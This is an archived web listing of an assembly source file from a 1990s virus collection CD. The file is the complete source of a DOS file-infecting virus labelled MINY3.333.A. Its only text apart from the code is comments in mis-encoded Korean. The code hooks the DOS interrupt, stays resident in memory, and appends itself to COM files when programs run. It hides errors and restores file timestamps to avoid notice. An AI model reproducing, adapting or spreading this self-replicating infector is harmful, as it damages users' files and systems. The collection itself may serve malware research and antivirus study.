home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
HPAVC
/
HPAVC CD-ROM.iso
/
KOREACOL.ZIP
/
MINY.ZIP
/
MINY3.ZIP
/
MY3-333.ASM
< prev
next >
Wrap
Assembly Source File
|
1996-08-12
|
7KB
|
231 lines
;******************************************************************************
;* *
;* MINY3.333.A Virus *
;* *
;* ╣A╕b: ¼ß╢ë ña╖í£ß»a ╡e╨s ╣A╕b: 1995æe 01╢⌐ 27╖⌐ - ╢⌐ ╖⌐ *
;* Seoul Virus Society *
;* *
;******************************************************************************
VIRUS SEGMENT PARA 'VIRUS'
ASSUME CS:VIRUS, DS:VIRUS
PARASIZE EQU (YEnd_Virus - Entry + 0Fh) SHR 4
Entry:
mov BP,100h ; BP=ña╖í£ß»a »í╕b ║ü¡íêt
NOP
JMP ChkVirinMEM ; £æ ¼w║ü ╠a╦a¥í ╕±╧a
NOP
NewInt21: ; ¼ü¥í╢à 21h ñσ ╖Ñ╚ߣ≤╦a
PushF
xchg ah,al
cmp al,4Bh ; »⌐╨ù╖Ñêa?
jnz ChkAHF0
call PushRES ; ╠a╖⌐ êq╡q ╤í┬ë
ChkAHF0:
cmp AL,0F0h ; £æ ¼w║ü ╡aªü ê±¼a╖Ñêa?
jnz OrgInt21
cmp ah,33h
jnz OrgInt21
PopF
xor ax,ax ; áx╖aíe 0000╖i ò⌐¥a║æ
IRET
OrgInt21: ; ╢Ñ£ü int 21¥í ╕±╧a
xchg ah,al
PopF
db 0EAh
OldInt21 dd ?
PushRES:
Push ax ; ¥A╗í»a╚ß ╕ß╕w
Push bx
Push cx
Push dx
Push ds
Push ES
Push si
mov bx,ds ; Int 24h ƒi └a╗í╨eöa.
xor ax,ax
mov ds,ax
Push DS:[0090h]
Push DS:[0092h]
mov word ptr DS:[0090h],offset NewInt24
mov word ptr DS:[0092h],cs
mov ds,bx
MOV AX,4301h ; ╖¬ïí/│aïí ¡ó¼≈╖a¥í ñaÄæ
xor cx,cx
int 21h
jnc Open_File
JMP PopRES
Open_File:
mov ax,3D02h ; ╠a╖⌐ ╡í╧e ╨aïí
Int 21h
jc PopRES
push cs
pop ds
xchg bx,ax ; ╨àùi ┤Φïí
Read_File:
mov ah,3Fh ; ╖¬┤ß ùi╖íïí
mov dx,offset Org4bytes
mov si,dx
mov cx,0004h
int 21h
ChkEXEFile:
cmp byte ptr ds:[SI],'M' ; EXE ╠a╖⌐ ╖Ñêa?
jz Close_File
Infect_COM:
cmp byte ptr DS:[SI+3],43h ; êq╡q ╡aªü ╤┬╖Ñ
jz Close_File
mov al,02h ; ╠a╖⌐╖ü ╣A╖⌐ ûߥí
call AH42h
cmp ax,1234 ; 1234 Ñíöa ╕b╖eêa?
jb Close_File
cmp ax,65000 ; 65000 Ñíöa ╟eêa?
ja Close_File
Push AX
add AX,0100h
mov word ptr DS:[Entry+1],ax ; ña╖í£ß»a »í╕b╢ß├í
Pop AX
sub ax,0003 ; JMP íw¥w ╣í╕b
mov word ptr ds:[FileHead+1],ax
mov byte ptr ds:[FileHead+3],43h
mov ax,5700h
Push AX
Int 21h
Push CX
Push DX
mov ah,40h ; ña╖í£ß»a │aïí
xor dx,dx
mov cx, offset End_Virus
Int 21h
mov al,00h ; ╠a╖⌐╖ü └ß╖q╖a¥í ╖íò╖
call AH42h
mov ah,40h ; ña╖í£ß»a │aïí
mov dx, offset FileHead
mov cx,0004h
Int 21h
Pop dx
Pop CX
Pop AX
Inc AL ; 5701h
Int 21h
Close_File: ; ╠a╖⌐ öhïí
mov ah,3eh
Int 21h
PopRES:
xor ax,ax
mov ds,ax
POP DS:[0092h]
POP DS:[0090h]
Pop si
Pop ES
Pop ds
Pop dx
Pop cx
Pop bx
Pop ax
RET
ChkVirinMEM:
mov AH,33h ; AX=F033h/Int 21hȒ
mov AL,0F0h ; AX=0 ╖ííe £æ╡A ña╖í£ß»a ╖╢╖q
xchg ah,al
Int 21h ;
or ax,ax ;
jz Already_MEM ;
xor bx,bx ; BX=0000
mov ds,bx ; 0000:0084h Ñó¼a
mov si,0083h
lea DI,SS:[BP+OldInt21]
Inc SI
cld
movsw
movsw
Push cs
Push cs
Pop ds
Pop ax
mov CX, PARASIZE ; └a╗í╨i £æ ╟aïí
dec ax
mov ds,ax
Inc BL ; BX=0001
cmp byte ptr DS:[BX-1],'Z' ;
jnz Already_MEM
sub word ptr DS:[BX+02],CX ;
sub word ptr DS:[BX+11h],CX ;
mov ES,word ptr DS:[BX+11h] ;
Push cs
Pop ds
mov si,BP
xor di,di
mov cx, offset TEnd_Virus
repz movsb
mov ds,cx ; Int 21h ƒi └a╗í╨eöa.
cli
mov word ptr ds:[BX+85h],es
mov word ptr ds:[BX+83h],offset NewInt21
sti
Already_Mem:
mov si,BP
push cs
pop ds
push cs ; ds=es
pop es
Re_COM: ; COM ╠a╖⌐ »⌐╨ù╨aïí
add si,offset Org4bytes ; ╢Ñ£ü òA╖í╚ß╖ü êt èü╨aïí
mov di,00FFh
Inc di ; └ß╖q╖ü 4 ña╖í╦a Ñóèü
push di
movsw
movsw
RET
Org4bytes db 90h,90h,0cdh,20h ; ╢Ñ£ü 4 ña╖í╦a╖ü êt
Ah42h:
mov ah,42h
xor cx,cx
xor dx,dx
Int 21h
RET
NewInt24: ; ╡A£ßêa Éa╗í ┤gëA╨eöa.
xor al,al
IRET
db 'Miny3'
FileHead db 0E9h
End_VIRUS:
db ?,?,?
TEnd_VIRUS:
virus ends
end Entry
